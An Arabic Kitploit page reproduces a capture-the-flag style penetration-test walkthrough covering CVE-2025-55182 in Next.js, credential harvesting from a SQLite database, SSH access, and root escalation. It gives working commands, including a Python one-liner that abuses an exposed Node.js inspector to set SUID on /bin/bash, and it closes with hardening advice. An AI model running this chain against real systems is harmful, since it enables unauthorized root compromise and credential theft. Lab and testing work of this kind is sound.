Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-55182 — تقرير فني لاختبار الاختراق يوضح استغلال ثغرة CVE-2025-55182 في Next.js، وجمع بيانات الاعتماد من SQLite، وتصعيد الامتيازات عبر Node.js inspector للوصول إلى صلاحيات الجذر. | Kitploit
أدوات/GitHubGitHub/chrisbarack/cve-2025-55182
تصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubchrisbarack/cve-2025-55182

cve-2025-55182

تقرير فني لاختبار الاختراق يوضح استغلال ثغرة CVE-2025-55182 في Next.js، وجمع بيانات الاعتماد من SQLite، وتصعيد الامتيازات عبر Node.js inspector للوصول إلى صلاحيات الجذر.

عرض المستودع
منذ 9س 7دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تقرير اختبار الاختراق: ثغرة RCE في Next.js وتصعيد الامتيازات عبر Node.js Inspector

يشرح هذا التقرير الفني مسار الاستغلال لاختراق هدف يستضيف تطبيق ويب Next.js ضعيفًا، وتحقيق الوصول الأولي عبر بيانات اعتماد تم جمعها، والاستفادة من أداة فحص V8 المحلية غير الآمنة في Node.js لتصعيد الامتيازات إلى صلاحيات الجذر.

المرحلة 1: الاستطلاع الخارجي واستغلال الويب

التمهيد الأولي

يستضيف الهدف تطبيق ويب Next.js يعمل على منافذ HTTP/HTTPS القياسية (80/443). يشير تعداد الدلائل القياسي والتحليل اليدوي إلى أن التطبيق يعمل بإصدار ضعيف أمام CVE-2025-55182.

الاستغلال عبر Burp Suite

لاستغلال الثغرة، اعترض حركة مرور التطبيق باستخدام Burp Suite (أو Burp Repeater) وحقن حمولة استغلال مصممة تستهدف CVE-2025-55182.

اكتشاف قاعدة البيانات

بعد تحقيق تنفيذ الأكواد وقراءة الملفات المحلية عبر الاستغلال، افحص دليل الكود المصدري للتطبيق. يقع ملف قاعدة بيانات SQLite المحلية (database.db) بجوار الكود المصدري الرئيسي للتطبيق.

المرحلة 2: استخراج بيانات الاعتماد والوصول الأولي

فحص قاعدة البيانات

استعلم أو صدّر محتويات ملف قاعدة البيانات لاستخراج سجلات المستخدمين المخزنة.

root@kitploit:~
sqlite3 database.db "SELECT * FROM users;"

استخراج بيانات الاعتماد

حدد موقع كلمة المرور النصية الصريحة المرتبطة بمستخدم SSH المحلي engineer.

تسجيل الدخول عبر SSH

استخدم بيانات الاعتماد المستردة لإنشاء جلسة SSH مع الجهاز الهدف:

root@kitploit:~
ssh engineer@<TARGET-IP>

استرجاع علم المستخدم

بمجرد المصادقة، اقرأ علم المستخدم الموجود في الدليل الرئيسي:

root@kitploit:~
cat /home/engineer/user.txt

المرحلة 3: تصعيد الامتيازات عبر Node.js Inspector

استطلاع المنافذ الداخلية

تحقق من الخدمات المرتبطة حصريًا بواجهة الاسترجاع المحلية (127.0.0.1) لتحديد أسطح الهجوم الداخلية:

root@kitploit:~
netstat -tulnp

النتيجة: توجد خدمة Node.js داخلية تستمع بنشاط على المنفذ المحلي 9229.

اكتشاف UUID المصحح

تتطلب منافذ تصحيح V8 في Node.js معرّف جلسة UUID فريدًا للاتصال عبر WebSocket. استعلم عن نقطة الاكتشاف المحلية باستخدام curl مع إضافة /json:

root@kitploit:~
curl -s http://127.0.0.1:9229/json

المخرجات:

root@kitploit:~
{
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/46a680a0-1cf5-4af4-9ce6-474f77329639"
}

تنفيذ حمولة تصعيد الامتيازات

نظرًا لأن عملية Node.js الهدف تعمل بصلاحيات الجذر، يمكنك إرسال رسالة Runtime.evaluate عبر بروتوكول Chrome DevTools (CDP) باستخدام Python عبر WebSockets لتعيين بت SUID على /bin/bash:

root@kitploit:~
python3 -c 'import websocket, json; ws = websocket.create_connection("ws://127.0.0.1:9229/<YOUR-UUID>"); ws.send(json.dumps({"id": 1, "method": "Runtime.evaluate", "params": {"expression": "process.mainModule.require(\"child_process\").execSync(\"chmod +s /bin/bash\")"}})); print(ws.recv()); ws.close()'

الدخول إلى قشرة الجذر

تحقق من أن /bin/bash أصبح الآن يتمتع بصلاحيات SUID مفعلة (-rwsr-sr-x)، ثم استدعِ Bash مع الحفاظ على الامتيازات:

root@kitploit:~
ls -l /bin/bash
bash -p

استرجاع علم الجذر

انتقل إلى الدليل الرئيسي لمستخدم الجذر لالتقاط العلم النهائي:

root@kitploit:~
cd /root
cat root.txt

يتطلب تأمين البيئات ضد هذه المتجهات تصحيح تطبيقات الويب الضعيفة أمام CVEs المعروفة، وتقييد صلاحيات ملفات قاعدة البيانات بشكل صحيح، وضمان عدم تعريض منافذ التصحيح (مثل أداة فحص Node.js على المنفذ 9229) أو تركها متاحة دون مصادقة في بيئات الإنتاج.

تنزيل الأداة